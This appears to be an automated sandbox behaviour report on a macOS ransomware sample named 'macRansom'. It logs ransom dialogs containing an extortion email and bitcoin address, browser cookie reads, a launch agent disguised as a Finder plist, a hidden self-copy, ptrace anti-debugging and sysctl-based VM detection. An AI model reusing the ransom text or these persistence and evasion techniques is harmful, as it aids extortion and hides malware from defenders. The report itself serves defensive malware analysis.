Source: /bin/sh (PID: 838)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 841)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 844)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 847)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 850)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 853)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 856)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 859)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 862)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 865)Shell process: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Reads local browser cookies
Source: /var/root/Library/.FS_Store (PID: 718)Binary cookie file read: /private/var/root/Library/Cookies/Cookies.binarycookies
Source: /var/root/Library/.FS_Store (PID: 718)Binary cookie file read: /private/var/root/Library/Cookies/Cookies.binarycookies
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 732)Killall command executed: killall Finder

Boot Survival:

Creates memory-persistent launch services
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent created file created: /var/root/Library/LaunchAgents/com.apple.finder.plist

Hooking and other Techniques for Hiding and Protection:

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent created file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Creates hidden files and/or links with names to possibly disguise malicious intentions
Source: /bin/mv (PID: 697)Hidden file moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Creates hidden Mach-O files
Source: /bin/mv (PID: 697)Submitted Mach-O file moved to hidden file: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Source: /Users/vreni/Desktop/macRansom (PID: 686)PTRACE system call (PT_DENY_ATTACH): PID 686 denies future traces
Source: /var/root/Library/.FS_Store (PID: 704)PTRACE system call (PT_DENY_ATTACH): PID 704 denies future traces
Source: /var/root/Library/.FS_Store (PID: 718)PTRACE system call (PT_DENY_ATTACH): PID 718 denies future traces
Moves itself during installation or deletes itself after installation
Source: /bin/mv (PID: 697)File moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store

Malware Analysis System Evasion:

Reads the sysctl hardware model value (may be used for detecting VM presence)
Source: /usr/sbin/sysctl (PID: 688)Sysctl read request: hw.model (6.2)
Source: /usr/sbin/sysctl (PID: 706)Sysctl read request: hw.model (6.2)
Source: /usr/sbin/sysctl (PID: 720)Sysctl read request: hw.model (6.2)
Reads the sysctl number of physical and/or logical CPUs value (may be used for detecting VM presence)
Source: /usr/sbin/sysctl (PID: 694)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 696)Sysctl read request: hw.physicalcpu (6.102)
Source: /usr/sbin/sysctl (PID: 712)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 714)Sysctl read request: hw.physicalcpu (6.102)
Source: /usr/sbin/sysctl (PID: 726)Sysctl read request: hw.logicalcpu (6.104)
Source: /usr/sbin/sysctl (PID: 728)Sysctl read request: hw.physicalcpu (6.102)

Language, Device and Operating System Detection:

Reads the system or server version plist file
Source: /usr/bin/osascript (PID: 736)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 740)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 743)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 747)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 750)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 753)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 756)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 759)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 762)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 765)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 768)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 771)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 774)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 777)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 780)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 784)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 787)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 790)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 793)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 796)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 799)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 802)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 805)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 808)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 811)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 814)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 817)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 820)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 823)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 826)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 829)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 832)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 835)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 838)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 841)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 844)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 847)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 850)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 853)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 856)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 859)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 862)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/osascript (PID: 865)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads the systems hostname
Source: /bin/sh (PID: 687)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 690)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 697)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 698)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 699)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 700)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 701)Sysctl requested: kern.hostname (1.10)
Source: /bin/bash (PID: 702)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 705)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 708)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 715)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 719)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 722)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 730)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 731)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 732)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 735)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 736)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 739)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 740)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 742)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 743)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 746)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 747)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 749)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 750)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 752)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 753)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 755)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 756)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 758)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 759)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 761)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 762)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 764)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 765)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 767)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 768)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 770)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 771)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 773)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 774)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 776)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 777)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 779)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 780)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 783)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 784)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 786)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 787)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 789)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 790)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 792)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 793)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 795)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 796)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 798)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 799)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 801)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 802)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 804)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 805)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 807)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 808)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 810)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 811)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 813)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 814)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 816)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 817)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 819)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 820)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 822)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 823)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 825)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 826)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 828)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 829)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 831)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 832)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 834)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 835)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 837)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 838)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 840)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 841)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 843)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 844)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 846)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 847)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 849)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 850)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 852)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 853)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 855)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 856)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 858)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 859)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 861)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 862)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 864)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 865)Sysctl requested: kern.hostname (1.10)


Runtime Messages

Command:/Users/vreni/Desktop/macRansom
Exitcode:55
Killed:False
Standard Output:Done
Standard Error:

Yara Overview

No Yara matches

Screenshot